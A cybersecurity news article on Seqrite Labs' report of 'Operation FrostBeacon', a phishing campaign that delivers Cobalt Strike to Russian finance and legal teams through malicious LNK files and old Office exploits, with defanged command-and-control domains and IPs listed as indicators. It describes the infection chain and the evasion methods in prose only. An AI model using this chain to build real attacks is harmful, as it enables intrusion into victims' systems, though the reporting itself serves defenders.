Cobalt Strike Malware Strikes Finance and Legal Departments in Operation FrostBeacon

Seqrite Labs has uncovered a sophisticated cybercrime campaign, dubbed Operation FrostBeacon, targeting organizations in the Russian Federation.

The campaign primarily focuses on finance and legal departments in B2B enterprises across the logistics, industrial production, and construction sectors. Researchers describe the campaign as financially motivated, using Cobalt Strike beacons for remote access and control of infected systems.

Sponsored

class="wp-block-heading" id="h-two-infection-clusters-lnk-and-cve-exploitation-chains">Two Infection Clusters: LNK and CVE Exploitation Chains

Operation FrostBeacon operates through two distinct infection clusters that eventually deliver the same Cobalt Strike payload.

The first, known as the LNK cluster, begins with phishing emails carrying malicious archives such as рекламация.zip or договор.rar.

These attachments contain a decoy Excel or Word document and a malicious LNK file, disguised with double extensions to appear harmless.

When opened, the shortcut file launches a hidden PowerShell command that triggers mshta.exe to fetch a remote file, such as dosing.hta, from domains such as valisi[.]ru or ezstat[.]ru.

The HTA file reconstructs and executes an obfuscated PowerShell loader that decodes several Base64- and XOR‑encoded blocks before injecting Cobalt Strike shellcode directly into system memory.

This in‑memory execution, combined with dynamic API resolution and reflective loading, helps evade antivirus and EDR controls.

The beacon configuration connects over HTTPS to update. ecols[.]ru using a Cobalt Strike malleable profile imitating jQuery web traffic.

The second cluster employs legacy Microsoft Office vulnerabilities CVE‑2017‑0199 and CVE‑2017‑11882 to deliver the same malware. Victims receive phishing documents such as рекламация.docx referencing remote templates hosted at aquacomplect[.]ru.

These templates silently execute HTA payloads, often chaining both CVEs to achieve remote code execution without macros. Despite being patched years ago, these exploits remain highly effective against unpatched systems.

Russian Infrastructure and Criminal Motive

Seqrite’s infrastructure analysis linked the campaign to over 40 Russian‑registered domains, all hosted through local registrars such as RU‑CENTER and REGRU.

Notable command‑and‑control domains include forensics. jwork[.]ru, moscable77[.]ru, bsprofi[.]ru, and iplis[.]ru. The beacon configuration also lists proxy IPs like 45.147.14.106 and 45.145.91.164, both associated with JSC Selectel (Russia).

Seqrite attributes the campaign to a Russian‑speaking, financially motivated group, noting similarities in tactics with those used by the Cobalt Group, a threat actor known for targeting financial institutions worldwide.

This campaign demonstrates how even in 2025, legacy Office vulnerabilities and Cobalt Strike abuse remain key tools for cybercriminals now weaponized against domestic financial and legal teams through Operation FrostBeacon.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Cobalt Strike Malware Strikes Finance and Legal Departments in Operation FrostBeacon appeared first on Cyber Security News.